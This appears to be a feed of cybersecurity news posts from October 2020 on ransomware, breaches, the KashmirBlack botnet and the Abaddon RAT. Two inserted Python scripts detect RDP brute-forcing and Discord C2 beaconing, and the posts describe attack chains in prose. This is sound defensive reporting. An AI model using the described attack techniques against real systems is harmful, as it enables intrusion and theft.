Systems at the multinational energy company Enel Group have been infected with Netwalker ransomware; it is the second ransomware attack suffered by the energy giant this year. Netwalker ransomware operators are asking a $14 million ransom for the decryption key; the hackers claim to have stolen several terabytes from the company and threaten to leak them if the ransom is not paid.

Enel S.p.A., or the Enel Group, is an Italian multinational energy company that is active in the sectors of electricity generation and distribution, as well as in the distribution of natural gas.

The company has more than 61 million customers in 40 countries and ranks 87th in the Fortune Global 500, with $90 billion in revenues in 2019.

In June, Enel was hit by Snake ransomware, but the attack was quickly contained and the malware was not able to spread within its network.

The news of a possible ransomware attack against Enel Group was reported to BleepingComputer by a researcher on October 19.

The researcher shared with BleepingComputer a Netwalker ransom note that appeared to be used in the attack on Enel Group.

Netwalker Enel Group ransom-note
Source Bleeping Computer

BleepingComputer attempted to notify Enel Group last week without success. A few days later, Netwalker announced the leak of the company data through their support chat.

Enel never replied to the message of the ransomware operators; for this reason, the attackers started leaking a portion of the stolen data as proof of the data breach.

The operators are asking $14 million worth of Bitcoin (roughly 1234.02380000 BTC).

ENEL group netwalker-page-for-enel
Source Bleeping Computer

Today, the Netwalker ransomware operators added Enel Group to their data leak site and some screenshots of unencrypted files stolen from the company.

The Italian cyber security firm TG soft publicly shared the news of the attack in a tweet:

The hackers stole about 5 terabytes of documents from the company and announced that they will “analyze every file for interesting things” and publish it on their leak site.

At the time of publishing this post, the company has yet to confirm the incident; the company’s handling of the breach will have to comply with the EU’s current privacy legislation, GDPR.

Pierluigi Paganini

(SecurityAffairs – hacking, ENEL Group)

The post Enel Group suffered the second ransomware attack this year appeared first on Security Affairs.

Google removes a set of 21 malicious apps from the Play Store

Google has removed 21 malicious apps from the official Play Store because they were found to serve intrusive and annoying ads.

Google has removed 21 new malicious apps from the official Play Store because they were found displaying intrusive ads.

The following malicious apps were spotted by researchers from cybersecurity firm Avast:

Shoot Them
Crush Car
Rolling Scroll
Helicopter Attack – NEW
Assassin Legend – 2020 NEW
Helicopter Shoot
Rugby Pass
Flying Skateboard
Iron it
Shooting Run
Plant Monster
Find Hidden
Find 5 Differences – 2020 NEW
Rotate Shape
Jump Jump
Find the Differences – Puzzle Game
Sway Man
Money Destroyer
Desert Against
Cream Trip – NEW
Props Rescue

The Android apps reported in the above table were downloaded nearly eight million times by Android users.

“the apps in question are 21 gaming apps that come packed with hidden adware that is part of the HiddenAds family. According to SensorTower, a mobile apps marketing intelligence and insights company, the apps have been downloaded approximately eight million times thus far.” reads the post published by Avast.

The tainted gaming apps are bundled with HiddenAds malware, adware that serves intrusive ads outside of the app.

Threat actors behind these malicious apps advertised them on social media channels to lure users into downloading them.

“Developers of adware are increasingly using social media channels, like regular marketers would,” Jakub Vávra, Threat Analyst at Avast, says. “This time, users reported they were targeted with ads promoting the games on YouTube. In September, we saw adware spread via TikTok. The popularity of these social networks make them an attractive advertising platform, also for cybercriminals, to target a younger audience.”

Once installed, the malicious apps hide their icons to prevent deletion and also hide behind relevant-looking advertisements, making them hard to identify.

The apps also have the ability to draw over other apps to show timed ads that users cannot skip. Experts also reported that in some cases the malware uses the browser to bombard the users with annoying ads.

Fortunately, the apps do not implement rootkit capabilities and users can uninstall them from the app manager features of the device.

It is not the first time that Avast has discovered tainted applications in the official Play Store. In July, researchers from Avast discovered a currency converter application in the Google Play store that had been downloaded by more than 10,000 users and that was designed to deliver the Cerberus banking Trojan.

Pierluigi Paganini

(SecurityAffairs – hacking, Google Play Store)

The post Google removes a set of 21 malicious apps from the Play Store appeared first on Security Affairs.

Fragomen law firm data breach exposed Google employee’s data

Immigration law firm Fragomen has disclosed a data breach that exposed current and former Google employees’ personal information.

Immigration law firm Fragomen, Del Rey, Bernsen & Loewy, LLP, one of the most prominent US law firms covering immigration law, disclosed a data breach.

The security breach exposed current and former Google employees’ personal information after an unauthorized third party gained access to a single file containing personal information relating to I-9 employment verification services.

The firm discovered the intrusion on September 24, 2020 and engaged a digital forensic investigation firm to assist with this investigation.

“We recently became aware of suspicious activity within our computer network. While our investigation is ongoing, we discovered that an unauthorized third party gained access to a single file containing personal information relating to I-9 employment verification services. This file contained personal information for a discrete number of Googlers (and former Googlers), including you,” reads the data breach notification sent to the impacted people.

A Form I-9 is filled out by all US employees to verify their identity and employment authorization for employment in the United States.

The form contains the employee’s information, including full name, date of birth, phone number, social security number, passport numbers, mailing address, and email address.

Exposed data could be abused by crooks to carry out multiple malicious activities, including identity theft. Users should be vigilant and report to the authorities any suspicious activities.

Fragomen is offering one year of free credit monitoring to the affected Google employees.

“We are offering complimentary identity theft protection and credit monitoring services to all Googlers (and former Googlers) who may have been affected by this incident in countries where these services are available. These services are available through IDX, the data breach and recovery services expert.” continues the notification notice. “IDX identity protection services include: 12 months of credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, and fully managed ID theft recovery services. With this protection, IDX will help you resolve issues if your identity is compromised.”

Pierluigi Paganini

(SecurityAffairs – hacking, Fragomen)

The post Fragomen law firm data breach exposed Google employee’s data appeared first on Security Affairs.

The Nastiest Malware of 2020

Reading Time: ~ 4 min.

For the third year running, we’ve examined the year’s biggest cyber threats and ranked them to determine which ones are the absolute worst. Somewhat unsurprisingly, phishing and RDP-related breaches remain the top methods we’ve seen cybercriminals using to launch their attacks. Additionally, while new examples of malware and cybercriminal tactics crop up each day, plenty of the same old players, such as ransomware, continue to get upgrades and dominate the scene.

For example, a new trend in ransomware this year is the addition of a data leak/auction website, where criminals will reveal or auction off data they’ve stolen in a ransomware attack if the victim refuses to pay. The threat of data exposure creates a further incentive for victims to pay ransoms, lest they face embarrassing damage to their personal or professional reputations, not to mention hefty fines under privacy regulations like GDPR.

But the main trend we’ll highlight here is that of modularity. Today’s malicious actors have adopted a more modular malware methodology, in which they combine attack methods and mix-and-match tactics to ensure maximum damage and/or financial success.

Here are a few of the nastiest characters and a breakdown of how they can work together.

  • Emotet botnet + TrickBot Trojan + Conti/Ryuk ransomware
    There’s a reason Emotet has topped our list for 3 years in a row. Even though it’s not a ransomware payload itself, it’s the botnet that is responsible for the most ransomware infections, making it pretty darn nasty. It’s often seen with TrickBot, Dridex, QakBot, Conti/Ryuk, BitPaymer and REvil.

    Here’s how an attack might start with Emotet and end with ransomware. The botnet is used in a malicious spam campaign. An unwitting employee at a company receives the spam email, accidentally downloads the malicious payload. With its foot in the door, Emotet drops TrickBot, an info-stealing Trojan. TrickBot spreads laterally through the network like a worm, infecting every machine it encounters. It “listens” for login credentials (and steals them), aiming to get domain-level access. From there, attackers can perform recon on the network, disable protections, and drop Conti/Ryuk ransomware at their leisure.
  • Ursnif Trojan + IcedID Trojan + Maze ransomware
    Ursnif, also known as Gozi or Dreambot, is a banking Trojan that has resurfaced after being mostly dormant for a few years. In an attack featuring this troublesome trio, Ursnif might land on a machine via a malicious spam email, botnet, or even TrickBot, and then drop the IcedID Trojan to improve the attackers’ chances of getting the credentials or intel they want. (Interestingly, IcedID has been upgraded to use steganographic payloads. Steganography in malware refers to concealing malicious code inside another file, message, image or video.) Let’s say the Trojans obtain the RDP credentials for the network they’ve infected. In this scenario, the attackers can now sell those credentials to other bad actors and/or deploy ransomware, typically Maze. (Fun fact: Maze is believed to have “pioneered” the data leak/auction website trend.)
  • Dridex/Emotet malspam + Dridex Trojan + BitPaymer/DoppelPaymer ransomware
    Like TrickBot, Dridex is another very popular banking/info-stealing Trojan that’s been around for years. When Dridex is in play, it is either dropped via Emotet or its authors’ own malicious spam campaign. Also like TrickBot, Dridex spreads laterally, listens for credentials, and typically deploys ransomware like BitPaymer/DoppelPaymer.

As you can see, there are a variety of ways the attacks can be carried out, but the end goal is more or less the same. The diverse means just help ensure the likelihood of success.

The characters mentioned above are, by no means, the only names on our list. Here are some of the other notable contenders for Nastiest Malware.

  • Sodinokibi/REvil/GandCrab ransomware – all iterations of the same ransomware, this ransomware as a service (RaaS) payload is available for anyone to use, as long as the authors get a cut of any successful ransoms.
  • CrySiS/Dharma/Phobos ransomware – also RaaS payloads, these are almost exclusively deployed using compromised RDP credentials that are either brute-forced or easily guessed.
  • Valak – a potent multi-functional malware distribution tool. Not only does it commonly distribute nasty malware such as IcedID and Ursnif, but it also has information stealing functionalities built directly into the initial infection.
  • QakBot – an info-stealing Trojan often dropped by Emotet or its own malspam campaigns with links to compromised websites. It’s similar to TrickBot and Dridex and may be paired with ProLock ransomware.

Combine protections to combat combined attacks.

If businesses want to stay safe, they need to implement multiple layers of protection against these types of layered attacks. Here are some tips from our experts.

  • Lock down RDP. Security analyst Tyler Moffitt says unsecured RDP has risen over 40% since the COVID-19 pandemic began because more businesses are enabling their workforce to work remotely. Unfortunately, many are not doing so securely. He recommends businesses use RDP solutions that encrypt the data and use multi-factor authentication to increase security when remoting into other machines.
  • Educate end users about phishing. Principal product manager Phil Karcher points out that many of the attack scenarios listed above could be prevented with stronger phishing/spam awareness among end users. He recommends running regular security training and phishing simulations with useful feedback. He also says it’s critical that employees know when and how to report a suspicious message.
  • Install reputable cybersecurity software. Security intelligence director Grayson Milbourne can’t stress enough the importance of choosing a solution that uses real-time threat intelligence and offers multi-layered shielding to detect and prevent multiple kinds of attacks at different attack stages.
  • Set up a strong backup and disaster recovery plan. VP of product management Jamie Zajac says that, particularly with a mostly or entirely remote workforce, businesses can’t afford not to have a strong backup. She strongly recommends regular backup testing and setting alerts and regular reporting so admins can easily see if something’s amiss.
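
Locking down RDP is easier to justify when you can see the brute-forcing that the CrySiS/Dharma/Phobos crews rely on. The script below is an added example, not code from the Webroot post: it walks Windows Security log events shaped like Event ID 4625 (failed logon) and 4624 (successful logon), counts failures per source IP over a sliding window, and raises a second finding when a flagged IP later logs in successfully (the credential was guessed). The logon types it accepts (10 = RemoteInteractive, 3 = Network, which is what Network Level Authentication reports) and the threshold are assumptions; the events are constructed, not real telemetry.

```python
"""Flag RDP brute-force attempts in Windows Security log events.

Added example, not code from the Webroot post. Events are constructed,
in-memory records carrying the Event ID 4625 / 4624 fields a SIEM would
normally supply.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Logon types RDP produces: 10 = RemoteInteractive, 3 = Network (NLA).
RDP_LOGON_TYPES = {3, 10}


def detect_rdp_bruteforce(events, threshold=20, window_seconds=300):
    """Return a list of findings.

    events: iterable of dicts with keys time (datetime), event_id (int),
            logon_type (int), ip (str), user (str).
    A 'rdp_bruteforce' finding fires once per source IP when it accumulates
    `threshold` failed RDP logons inside any `window_seconds` window; a
    'rdp_bruteforce_success' finding fires if that IP later logs in.
    """
    failures = defaultdict(list)   # ip -> failure timestamps inside the window
    flagged = set()
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] not in RDP_LOGON_TYPES:
            continue
        ip = ev["ip"]
        if ev["event_id"] == 4625:
            times = failures[ip]
            times.append(ev["time"])
            cutoff = ev["time"] - timedelta(seconds=window_seconds)
            while times and times[0] < cutoff:      # expire old failures
                times.pop(0)
            if len(times) >= threshold and ip not in flagged:
                flagged.add(ip)
                findings.append({"type": "rdp_bruteforce", "ip": ip,
                                 "failures": len(times), "at": ev["time"]})
        elif ev["event_id"] == 4624 and ip in flagged:
            findings.append({"type": "rdp_bruteforce_success", "ip": ip,
                             "user": ev["user"], "at": ev["time"]})
    return findings


def sample_events():
    """Constructed sample: one IP sprays 25 guesses in about two minutes and
    then succeeds; one admin mistypes a password twice (must not fire)."""
    t0 = datetime(2020, 10, 20, 3, 0, 0)
    events = []
    for i in range(25):
        events.append({"time": t0 + timedelta(seconds=5 * i), "event_id": 4625,
                       "logon_type": 3, "ip": "203.0.113.7", "user": f"user{i % 5}"})
    events.append({"time": t0 + timedelta(seconds=130), "event_id": 4624,
                   "logon_type": 10, "ip": "203.0.113.7", "user": "administrator"})
    for secs, eid in ((10, 4625), (40, 4625), (70, 4624)):
        events.append({"time": t0 + timedelta(seconds=secs), "event_id": eid,
                       "logon_type": 10, "ip": "198.51.100.4", "user": "jsmith"})
    return events


if __name__ == "__main__":
    for f in detect_rdp_bruteforce(sample_events()):
        print(f)
```

Tune the threshold to the environment: a jump host that fronts hundreds of users needs a higher one than a single server, and the success-after-burst finding is the one worth paging on.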

Discover more about the 2020’s Nastiest Malware on the Webroot Community.

The post The Nastiest Malware of 2020 appeared first on Webroot Blog.

Over 100 irrigation systems left exposed online without protection

Researchers found more than 100 smart irrigation systems running ICC PRO that were left exposed online without a password last month.

Security experts from the Israeli security firm Security Joes discovered more than 100 irrigation systems running ICC PRO that were left exposed online without protection. ICC PRO is a top-shelf smart irrigation system designed by Motorola.

The ICC PRO systems were deployed with default factory settings, which don’t have a password for the default user’s account.

To worsen the situation, experts pointed out that it is quite simple to search for these devices exposed on the Internet by using IoT search engines like Shodan.

Once the attacker has gained access to the device, they can perform multiple actions from the control panel, including controlling the quantity and pressure of the water delivered to the pumps, deleting users, or changing settings.

The experts revealed that the majority of the devices were located in Israel.

Security Joes co-founder Ido Naor reported his findings to CERT Israel last month, which notified Motorola and CERT teams in other countries. CERT Israel also contacted the companies that exposed the irrigation systems online without protection. Motorola also sent a letter to its customers about the risks of exposing irrigation systems online without protection.

The good news is that several organizations have started securing their devices: the number of unsecured ICC PRO instances has dropped to 78 today.

In April, an attack hit an Israeli water facility attempting to modify water chlorine levels. In June, officials from the Water Authority revealed two more cyber attacks on other facilities in the country.

Two cyber-attacks took place in June and according to the officials, they did not cause any damage to the targeted infrastructure.

One of the attacks hit agricultural water pumps in upper Galilee, while the other one hit water pumps in the central province of Mateh Yehuda.

Israel’s National Cyber Directorate announced to have received reports of cyber attacks aimed at supervisory control and data acquisition (SCADA) systems at wastewater treatment plants, pumping stations and sewage facilities.

Pierluigi Paganini

(SecurityAffairs – hacking, irrigation systems)

The post Over 100 irrigation systems left exposed online without protection appeared first on Security Affairs.

Nitro PDF data breach might impact major companies, including Microsoft, Google, and Apple

Nitro PDF suffered a massive data breach that impacts many major organizations, including Apple, Chase, Citibank, Google, and Microsoft.

A massive data breach suffered by the Nitro PDF might have a severe impact on well-known organizations, including Google, Apple, Microsoft, Chase, and Citibank.

Nitro Software, Inc. develops commercial software used to create, edit, sign, and secure Portable Document Format (PDF) files and digital documents. The company has over 650,000 business customers worldwide, and claims millions of users across the globe.

According to the security advisory issued by the software maker, an unauthorized third party gained limited access to a company database.

"NITRO ADVISES OF LOW IMPACT SECURITY INCIDENT
* AN ISOLATED SECURITY INCIDENT INVOLVING LIMITED ACCESS TO NITRO DATABASE BY AN UNAUTHORISED THIRD PARTY
* DATABASE DOES NOT CONTAIN USER OR CUSTOMER DOCUMENTS.
* INCIDENT HAS HAD NO MATERIAL IMPACT ON NITRO'S ONGOING OPERATIONS.
* INVESTIGATION INTO INCIDENT REMAINS ONGOING
* NO EVIDENCE CURRENTLY THAT ANY SENSITIVE OR FINANCIAL DATA RELATING TO CUSTOMERS IMPACTED OR IF INFO MISUSED
* DOES NOT ANTICIPATE A MATERIAL FINANCIAL IMPACT TO ARISE FROM INCIDENT
* INCIDENT IS NOT EXPECTED TO IMPACT CO'S PROSPECTUS FORECAST FOR FY2020"

Cybersecurity intelligence firm Cyble came across a threat actor that was selling a database, allegedly stolen from Nitro Software’s cloud service, that includes users’ data and documents. The huge archive contains 1TB of documents, and the threat actor is attempting to sell it in a private auction with a starting price of $80,000.

The database contains a table named ‘user_credential’ that contains 70 million user records, including email addresses, full names, bcrypt hashed passwords, titles, company names, IP addresses, and other system-related data.

Cyble shared the database with Bleeping Computer, which was able to verify its authenticity.

“From the samples of the database shared with BleepingComputer, the document titles alone disclose a great deal of information about financial reports, M&A activities, NDAs, or product releases.” states BleepingComputer.

The records in the document database contain a file’s title, whether it was created or signed, which account owns the document, and whether it is public.

I have reached out to Cyble for a comment; below is their statement:

“Considering the scale and extent of the breach, this is one of the worst breaches Cyble has seen in the last few years. The cybercriminals were not only able to access sensitive account details, but also the information related to shared documents as well. Majority of the Fortune 500 organizations are affected by this breach.”

The databases contain a large number of records belonging to well-known companies:

Company     # of accounts   # of documents
Amazon      5,442           17,137
Apple       584             6,405
Citi        653             137,285
Chase       85              177
Google      3,678           32,153
Microsoft   3,330           2,390

Cyble has added the data related to the NITRO PDF data breach to its AmIBreached.com data breach notification service.

Pierluigi Paganini

(SecurityAffairs – hacking, Nitro PDF)

The post Nitro PDF data breach might impact major companies, including Microsoft, Google, and Apple appeared first on Security Affairs.

KashmirBlack, a new botnet in the threat landscape that rapidly grows

Security experts spotted a new botnet, tracked as KashmirBlack botnet, that likely infected hundreds of thousands of websites since November 2019.

Security experts from Imperva have spotted a new sophisticated botnet, tracked as KashmirBlack, that is believed to have already infected hundreds of thousands of websites by exploiting vulnerabilities in their content management system (CMS) platforms.

The KashmirBlack botnet has been active at least since November 2019; its operators leverage dozens of known vulnerabilities in the target servers.

Experts believe that the botmaster of the KashmirBlack botnet is a hacker that goes online with moniker “Exect1337,” who is a member of the Indonesian hacker crew ‘PhantomGhost’.

The experts observed millions of attacks per day on average, on thousands of victims in more than 30 different countries around the world.

“It has a complex operation managed by one C&C (Command and Control) server and uses more than 60 – mostly innocent surrogate – servers as part of its infrastructure. It handles hundreds of bots, each communicating with the C&C to receive new targets, perform brute force attacks, install backdoors, and expand the size of the botnet.” reads the first part of two reports published by the experts detailing the DevOps implementation behind the botnet.

The primary purpose of the KashmirBlack botnet is to abuse resources of compromised systems for cryptocurrency mining and redirecting a site’s legitimate traffic to spam pages.

Experts observed a continuous growth of the botnet since its discovery along with an increasing level of complexity.

In May experts observed an increase in the command-and-control (C&C) infrastructure and the exploits used by botnet operators.

KashmirBlack scans the internet for sites running vulnerable CMS versions and attempts to exploit known vulnerabilities in them to take over the underlying server.

The botnet operators compromise websites running multiple CMS platforms, including WordPress, Joomla!, PrestaShop, Magento, Drupal, vBulletin, osCommerce, OpenCart, and Yeager, by exploiting known vulnerabilities in each of them.

“During our research we witnessed its evolution from a medium-volume botnet with basic abilities to a massive infrastructure that is here to stay,” Imperva concludes.

The second part of the report also includes Indicators of Compromise (IoCs) for this botnet.

Pierluigi Paganini

(SecurityAffairs – hacking, KashmirBlack botnet)

The post KashmirBlack, a new botnet in the threat landscape that rapidly grows appeared first on Security Affairs.

Finnish psychotherapy center Vastaamo suffered a shocking security breach

Private Finnish psychotherapy center Vastaamo suffered a security breach, hackers are now demanding ransom to avoid the leak of sensitive data they have stolen.

Finland’s interior minister summoned an emergency meeting Sunday after the private Finnish psychotherapy center Vastaamo suffered a security breach that caused the exposure of patient records. To make matters worse, the hackers are now demanding ransoms and threatening to leak the stolen data.

Vastaamo operates as a sub-contractor for Finland’s public health system, according to the authorities, the hackers have stolen patient sensitive data during two attacks that started almost two years ago.

Finnish Interior Minister Maria Ohisalo tweeted that authorities would “provide speedy crisis help to victims” of the security breach at the Vastaamo psychotherapy center, an incident she called “shocking and very serious.”

President Sauli Niinisto called the blackmailing “cruel” and “repulsive,” while Prime Minister Sanna Marin added that such kind of attacks is “shocking in many ways.”

The attacker, who goes online with the moniker ’ransom_man’, has already leaked 300 patient records containing names and contact information and is blackmailing the victims directly by email.

“It was not immediately clear if the stolen information included diagnoses, notes from therapy sessions or other potentially damaging information. Also, it wasn’t clear why the information was surfacing only now.” reported the Associated Press.

According to a statement published by Vastaamo on Saturday, the first attack likely took place between the end of November 2018 and March 2019.

The National Bureau of Investigation is investigating the incident and revealed that the data breach may have impacted up to “tens of thousands” of the Vastaamo clients.

“What makes this case exceptional is the contents of the stolen material,” Marko Leponen, the National Bureau of Investigation’s chief investigator assigned to the case, told reporters.

Vastaamo urged clients who were contacted by the intruders to immediately contact Finnish police.

Finnish media reported that the crooks are demanding ransoms of 200 euros’ worth of Bitcoin from victims, rising to 500 euros if the victim does not pay within 24 hours. The crooks also attempted to blackmail Vastaamo directly, asking for a 450,000 euro ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, Vastaamo)

The post Finnish psychotherapy center Vastaamo suffered a shocking security breach appeared first on Security Affairs.

Ransomware attack disabled Georgia County Election database

A ransomware attack recently hit Georgia county government and reportedly disabled a database used to verify voter signatures.

A ransomware attack hit a Georgia county government early this month and disabled a database used to verify voter signatures when authenticating absentee ballots. Comparing signatures is a common way to validate absentee ballots sent by mail.

The media pointed out that this is the first reported case of a ransomware attack against a system used in the upcoming 2020 Presidential election.

Ransomware attacks could have a dramatic impact on the elections, they could disrupt voting systems and raise doubts about the validity of the vote.

The attack took place on October 7, it hit Hall County, in the northern part of the state and it disabled the county’s voter signature database.

“One of the databases the county uses to verify voter signatures on absentee ballots is not working after some county network outages due to a ransomware attack on Oct. 7.” reported the Gainesville Times. “Registration Coordinator Kay Wimpye with the county elections office said employees can still verify voter signatures by manually pulling hard copies of voter registration cards, which is more time-consuming. Most voter signatures can be verified using a state database that has been unaffected by the outages, she said.”

The media reported that the Hall County attack was carried out by Doppelpaymer ransomware operators that also leaked stolen data on their dark web leak site to force the organization to pay the ransom.

The county website published an update stating that the attack did not impact the voting process for citizens, which differs from the scenario reported by the Times.

Pierluigi Paganini

(SecurityAffairs – hacking, Georgia county)

The post Ransomware attack disabled Georgia County Election database appeared first on Security Affairs.

COVID-19 vaccine manufacturer suffers a data breach

Dr. Reddy’s, the Indian contractor for Russia’s “Sputnik V” COVID-19 vaccine, was hit with a cyber-attack that forced the company to close its plants.

Indian COVID-19 vaccine manufacturer Dr. Reddy’s Laboratories was hit with a cyber attack that forced it to shut down its plants in Brazil, India, Russia, the U.K., and the U.S..

According to The Economic Times the company suffered a data breach.

The Indian company is the contractor for Russia’s “Sputnik V” COVID-19 vaccine; the Drugs Controller General of India (DCGI) recently authorized it to enter Phase 2 human trials.

According to the BBC, the phone lines at the company’s UK sites in Cambridgeshire and Yorkshire were down.

In response to the security breach, the COVID-19 vaccine manufacturer has isolated all data center services.

“In the wake of a detected cyber-attack, we have isolated all data center services to take required preventive actions,” CIO Mukesh Rathi said in a media statement. “We are anticipating all services to be up within 24 hours, and we do not foresee any major impact on our operations due to this incident.”

According to the media, the attack is likely the result of a cyber espionage operation aimed at stealing info on the COVID-19 vaccine development.

At the time of writing it is not clear whether the attack was carried out by a nation-state actor or a cybercrime gang.

In July, the British National Cyber Security Centre revealed that the Russia-linked group APT29 was conducting cyberespionage campaigns targeting UK, US, and Canadian organizations working on the development of a COVID-19 vaccine.

In the same period, the US Justice Department accused two Chinese hackers of stealing trade secrets from companies worldwide and, more recently, of attacking firms developing a vaccine for COVID-19.

In September, the El Pais newspaper reported that Chinese hackers had stolen information from Spanish laboratories working on a vaccine for COVID-19.

Pierluigi Paganini

(SecurityAffairs – hacking, COVID-19)

The post COVID-19 vaccine manufacturer suffers a data breach appeared first on Security Affairs.

Is the Abaddon RAT the first malware using Discord as C&C?

Abaddon is the first RAT that uses the freeware instant messaging and VoIP app and digital distribution platform Discord as a command & control server.

Researchers from MalwareHunterTeam have spotted a new piece of remote access trojan (RAT) dubbed ‘Abaddon’ that is likely the first malware using the Discord platform as command and control. The Abaddon malware connects to the Discord command and control server to check for new commands to execute.

Experts also warn that the malware’s author is developing a ransomware feature.

In the past, other threat actors already abused the Discord platform for different purposes, such as using it as a stolen data drop.

“In the past, we have reported on how threat actors use Discord as a stolen data drop or have created malware that modifies the Discord client to have it steal credentials and other information.” reported Bleeping Computer that first reported the news.

Abaddon implements a data-stealing feature designed to collect multiple kinds of data from the infected host, including Chrome cookies, saved credit cards and credentials, Steam credentials, Discord tokens and MFA information.

The malware also collects system information such as country, IP address, and hardware information.

According to Bleeping Computer the malware supports the following commands:

  • Steal a file or entire directories from the computer
  • Get a list of drives
  • Open a reverse shell that allows the attacker to execute commands on the infected PC.
  • Launch in-development ransomware (more later on this).
  • Send back any collected information and clear the existing collection of data.

The malicious code connects to the Command & Control every ten seconds for new tasks to execute.
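
A ten-second polling cadence is also the defender's handle on this kind of C2: legitimate use of a chat platform is bursty, a RAT checking for tasks is metronomic. The script below is an added example, not part of the Security Affairs article or the original analysis. It groups web-proxy records by source host and destination domain, measures the gaps between consecutive requests, and flags pairs whose gaps are both frequent and nearly constant. The watched domains, the log format and the log records themselves are assumptions constructed for the example.

```python
"""Flag hosts polling a chat platform at a fixed interval, the pattern of a
RAT that checks its channel for new commands every few seconds.

Added example; not part of the Security Affairs article or of the original
analysis. WATCHED_DOMAINS is an assumption about where such traffic would go,
and the log records are constructed, not captured.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

WATCHED_DOMAINS = ("discord.com", "discordapp.com")  # assumption


def is_watched(host):
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)


def parse_record(line):
    """Records are 'ISO-8601-timestamp src_host dest_host path' (constructed format)."""
    ts, src, dst, path = line.split(" ", 3)
    return datetime.fromisoformat(ts), src, dst.lower(), path


def find_beacons(lines, min_hits=10, max_jitter=0.2):
    """Return {(src, dst): mean_gap_seconds} for (host, domain) pairs whose
    requests arrive at a near-constant cadence.

    max_jitter bounds the coefficient of variation (stdev / mean) of the gaps
    between consecutive requests; human-driven traffic is far burstier."""
    hits = defaultdict(list)
    for line in lines:
        ts, src, dst, _ = parse_record(line)
        if is_watched(dst):
            hits[(src, dst)].append(ts)
    beacons = {}
    for key, times in hits.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds()
                for earlier, later in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        if statistics.pstdev(gaps) / mean_gap <= max_jitter:
            beacons[key] = round(mean_gap, 1)
    return beacons


def sample_log():
    """Constructed proxy records: one implant beaconing every 10 s with slight
    jitter, one person using the same platform at irregular intervals."""
    base = datetime(2020, 10, 20, 9, 0, 0)
    lines = []
    for i in range(30):
        t = base + timedelta(seconds=10 * i + 0.3 * (i % 2))
        lines.append(f"{t.isoformat()} ws-042 discord.com /api/channels/1/messages")
    t = base
    lines.append(f"{t.isoformat()} ws-017 discord.com /api/channels/2/messages")
    for gap in (3, 45, 2, 120, 7, 60, 1, 300, 15, 90, 5):
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} ws-017 discord.com /api/channels/2/messages")
    lines.append(f"{base.isoformat()} ws-042 www.example.com /index.html")
    return lines


if __name__ == "__main__":
    for (src, dst), gap in find_beacons(sample_log()).items():
        print(f"{src} -> {dst}: beaconing every {gap} s")
```

A real deployment would run this over a rolling window of proxy or DNS logs and pair any hit with the host's process list, since the same cadence from a browser tab with the web client open is the obvious false positive to rule out.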

Experts pointed out that the malware also implements the commands to encrypt files of the infected system and decrypt them.

The ransomware feature appears to be under development.

Pierluigi Paganini

(SecurityAffairs – hacking, Abaddon)

The post Is the Abaddon RAT the first malware using Discord as C&C? appeared first on Security Affairs.

Trick or Treat: Avoid These Spooky Threats This Halloween


Spooky season is among us, and ghosts and goblins aren’t the only things hiding in the shadows. Online threats are also lurking in the darkness, preparing to haunt devices and cause some hocus pocus for unsuspecting users. This Halloween season, researchers have found virtual zombies and witches among us – a new trojan that rises from the dead no matter how many times it’s deleted and malicious code that casts an evil spell to steal users’ credit card data.

Let’s unlock the mystery of these threats so you can avoid cyber-scares and continue to live your online life free from worry.

Zombie Malware Hides in the Shadows

Just like zombies, malware can be a challenge to destroy. Oftentimes, it requires a user to completely wipe their device by backing up files, reinstalling the operating system, and starting from scratch. But what if this isn’t enough to stop the digital walking dead from wreaking havoc on your device?

Recently, a new type of Trojan has risen from the dead to haunt users no matter how many times it’s deleted. This zombie-like malware attaches itself to a user’s Windows 10 startup system, making it immune to system wipes since the malware can’t be found on the device’s hard drive. This stealthy malware hides on the device’s motherboard and creates a Trojan file that reinstalls the malware if the user tries to remove it. Once it sets itself up in the darkness, the malware scans for users’ private documents and sends them to an unknown host, leaving the user’s device in a ghoulish state.

Cybercriminals Leave Credit Card Users Spellbound

A malware misfortune isn’t the only thing that users should beware of this Halloween. Cybercriminals have also managed to inject malicious code into a wireless provider’s web platform, casting an evil spell to steal users’ credit card data. The witches and warlocks allegedly responsible for casting this evil spell are part of a Magecart spin-off group that’s known for its phishing prowess. To pull off this attack, they planted a credit card skimmer on the wireless provider’s checkout page. This allowed the hackers to exfiltrate users’ credit card data whenever they made a purchase – a spell that’s difficult to break.

Why These Cyberspooks Are Emerging

While these threats might seem like just another Halloween trick, there are other forces at play. According to McAfee’s Quarterly Threats Report from July 2020, threats like malware, phishing and trojans have proven opportunistic for cybercriminals as users spend more and more time online – whether it be working from home, distance learning, or connecting with friends and loved ones. In fact, McAfee Labs observed 375 threats per minute in Q1 2020 alone.

So, as hackers continue to adapt their techniques to take advantage of users spending more time online, it’s important that people educate themselves on emerging threats so they can take necessary precautions and live their digital lives free from worry.

How to Stay Protected

Fortunately, there are a number of steps you can take to prevent these threats from haunting your digital life. Follow these tips to keep cybersecurity tricks at bay this spooky season:

Beware of emails from unknown senders

Zombie malware is easily spread by phishing, which is when scammers try to trick you out of your private information or money. If you receive an email from an unknown user, it’s best to proceed with caution. Don’t click on any links or open any attachments in the email and delete the message altogether.

Review your accounts

Look over your credit card accounts and bank statements often to check whether someone is fraudulently using your financial data – you can even sign up for transaction alerts that your bank or credit card company may provide. If you see any charges that you did not make, report it to the authorities immediately.

Use a comprehensive security solution

Add an extra layer of protection with a security solution like McAfee® Total Protection to help safeguard your digital life from malware and other threats. McAfee Total Protection also includes McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files.

Stay updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Trick or Treat: Avoid These Spooky Threats This Halloween appeared first on McAfee Blogs.

New Emotet attacks use a new template urging recipients to upgrade Microsoft Word

Emotet operators have started using a new template this week that pretends to be a Microsoft Office message urging a Microsoft Word update.

